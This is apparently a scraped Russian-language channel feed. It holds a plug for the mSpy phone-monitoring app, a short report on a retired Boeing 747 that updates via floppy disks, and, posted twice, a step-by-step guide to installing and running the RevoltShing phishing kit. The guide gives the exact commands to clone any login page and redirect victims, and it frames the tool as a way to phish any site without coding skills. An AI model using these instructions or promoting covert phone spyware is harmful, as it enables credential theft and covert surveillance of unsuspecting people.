Программа совместима как с Android, так и с iOS системами. Единственным недостатком будет тот факт, что утилиту нужно покупать. Хотя, почему бы за хороший продукт и не заплатить?
📌https://www.mspy.com/
#приложения #слежка
Исследование: самолеты Boeing 747 получают обновления на 3,5-дюймовых дискетах
Недавно авиакомпания British Airways отказалась от использования самолетов Boeing 747, и благодаря этому у специалистов из компании Pen Test Partners появилась редкая для ИБ-экспертов возможность исследовать уже списанный лайнер, пока тот не был утилизирован.
Одной из наиболее интересных находок исследователей стал дисковод для 3,5-дюймовых дискет, который используется для загрузки навигационной базы данных (можно увидеть на иллюстрации ниже). Исследователь пояснил, что по правилам БД должна обновляться каждые 28 дней и посочувствовал инженерам, которым регулярно приходится иметь дело с такой малоприятной рутиной.
Кроме этого, специалистам Pen Test Partners не удалось обнаружить никакой двусторонней связи между доступными пассажирам системами и управляющим доменом. Более того, между этими системами существует специальная DMZ-зона, обойти которую вряд ли представляется возможным.
Недавно авиакомпания British Airways отказалась от использования самолетов Boeing 747, и благодаря этому у специалистов из компании Pen Test Partners появилась редкая для ИБ-экспертов возможность исследовать уже списанный лайнер, пока тот не был утилизирован.
Одной из наиболее интересных находок исследователей стал дисковод для 3,5-дюймовых дискет, который используется для загрузки навигационной базы данных (можно увидеть на иллюстрации ниже). Исследователь пояснил, что по правилам БД должна обновляться каждые 28 дней и посочувствовал инженерам, которым регулярно приходится иметь дело с такой малоприятной рутиной.
Кроме этого, специалистам Pen Test Partners не удалось обнаружить никакой двусторонней связи между доступными пассажирам системами и управляющим доменом. Более того, между этими системами существует специальная DMZ-зона, обойти которую вряд ли представляется возможным.
Автоматизированные фишинг атаки
Фишинг атаки переживают свой пик популярности. Их проведение стало проще, а способы изщреннее. При этом количество неопытных пользователей не уменьшилось. Среднестатистический юзер распознаёт лишь 6 из 10 фишинговых сообщений, согласно исследованию Intel Security.
Более того, индустрия фишинга создала огромное количество инструментов автоматизации проведения атак. RevoltShing - один из них. Он копирует абсолютно любой сайт с разделом авторизации и имеет функцию перенаправления после ввода данных.
Сайты копируются настолько качественно, что активными остаются все кнопки, а визуальный контент в виде часов, анимаций также частично остается. Давайте взглянем, как это работает «изнутри».
Установка
Устанавливаем Kali Linux.
Скачиваем репозиторий с github командой
Переходим в папку, даем права, запускаем установщик
Далее нужно запустить сконфигурированный сервер и саму консоль RevoltShing командами
Использование
Перед вами появится консоль, где система по стандарту предложит клонировать сайт Банка Америки.
Поменять настройки можно командой
Перенаправление меняется командой
Для старта просто вписываем
Готово. Вот так просто, без знаний языков программировани,я возможно создать фишинговый сайт абсолютно любого ресурса.
#хакинг
Фишинг атаки переживают свой пик популярности. Их проведение стало проще, а способы изщреннее. При этом количество неопытных пользователей не уменьшилось. Среднестатистический юзер распознаёт лишь 6 из 10 фишинговых сообщений, согласно исследованию Intel Security.
Более того, индустрия фишинга создала огромное количество инструментов автоматизации проведения атак. RevoltShing - один из них. Он копирует абсолютно любой сайт с разделом авторизации и имеет функцию перенаправления после ввода данных.
Сайты копируются настолько качественно, что активными остаются все кнопки, а визуальный контент в виде часов, анимаций также частично остается. Давайте взглянем, как это работает «изнутри».
Установка
Устанавливаем Kali Linux.
Скачиваем репозиторий с github командой
git clone https://github.com/AngelSecurityTeam/RevoltShing.gitПереходим в папку, даем права, запускаем установщик
cd RevoltShingchmod +x install.shbash install.shДалее нужно запустить сконфигурированный сервер и саму консоль RevoltShing командами
python Server.pypython3 revoltshing.pyИспользование
Перед вами появится консоль, где система по стандарту предложит клонировать сайт Банка Америки.
Поменять настройки можно командой
edit url https://<страница авторизации нужного ресурса>Перенаправление меняется командой
edit url_destination https://<куда направить пользователя после ввода данных>Для старта просто вписываем
startГотово. Вот так просто, без знаний языков программировани,я возможно создать фишинговый сайт абсолютно любого ресурса.
#хакинг